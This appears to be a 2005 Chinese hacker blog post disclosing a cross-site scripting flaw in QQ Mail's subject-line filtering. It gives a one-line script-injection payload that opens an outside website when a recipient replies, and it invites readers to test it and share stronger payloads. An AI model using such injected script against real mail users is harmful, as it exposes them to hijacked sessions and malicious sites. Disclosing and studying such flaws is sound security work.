2005-11-20 21:38:25 by: h4x0r
Selected Content

QQ邮件存在严重安全漏洞

Font Size: Large | Medium | Small
文章作者:H4x0r
已发表11期黑客x档案

最近发现QQ信箱的一个安全漏洞
漏洞属于跨站漏洞,由QQ信箱过滤的参数不严引起

在这里就不再皆图了,自己测试

测试方法:在发新邮件,主题上写
跨站语句
"></td><>script>window.open('http://www.21o.net/');</script>
其中里面的('http://www.21o.net/&#39;)是要进行跨站的网站,但打开信件的时间不是自动打开
需要回复,就会出现。好了就到这里。
有些朋友问我,为什么不写一条好的语句, 起是我也想过这问题,但由于字数限制,所以不会成功。
如果有什么好的方法千万要分享以下哦。我的QQ:186348709
Comments Feed Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=167

There is no comment on this article.

Post Comment
Smilies
[smile] [confused] [cool] [cry]
[eek] [angry] [wink] [sweat]
[lol] [stun] [razz] [redface]
[rolleyes] [sad] [yes] [no]
[heart] [star] [music] [idea]
Enable UBB Codes
Auto Convert URL
Show Smilies
Hidden Comment
Username:   Password:   Register Now?
Security Code * Please Enter the Security Code